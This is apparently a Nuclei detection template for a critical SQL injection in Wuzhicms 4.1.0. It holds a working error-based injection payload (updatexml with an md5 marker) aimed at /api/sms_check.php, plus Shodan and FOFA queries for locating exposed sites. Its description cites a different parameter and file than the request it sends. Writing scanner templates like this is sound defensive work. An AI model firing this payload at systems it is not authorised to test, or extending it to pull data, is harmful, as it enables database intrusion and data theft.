42 lines
1.3 KiB
YAML
42 lines
1.3 KiB
YAML
id: wuzhicms-sqli
|
|
|
|
info:
|
|
name: Wuzhicms 4.1.0 - SQL Injection
|
|
author: princechaddha
|
|
severity: critical
|
|
description: |
|
|
Wuzhicms 4.1.0 contains a SQL injection vulnerability via the grouppid parameter of /coreframe/app/member/admin/group.php. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
|
|
reference:
|
|
- https://github.com/wuzhicms/wuzhicms/issues/184
|
|
- https://vulners.com/cnvd/CNVD-2022-36985
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
|
|
cvss-score: 10
|
|
cwe-id: CWE-89
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
shodan-query: http.html:"Wuzhicms"
|
|
fofa-query: title="Wuzhicms"
|
|
tags: wuzhicms,sqli
|
|
variables:
|
|
num: "999999999"
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/api/sms_check.php?param=1%27%20and%20updatexml(1,concat(0x7e,(SELECT%20md5({{num}})),0x7e),1)--%20"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- 'c8c605999f3d8352d7bb792cf3fdb25'
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# digest: 490a00463044022047303038b8d2cfc63825dcccee9ea95b71bd37df9ac4d2657fb88f4690eded0702207e0764341952d60dc1b6bbba220414877ec0661c1fc60f5bd65d8fed2427ff5f:922c64590222798bb761d5b6d8e72950
|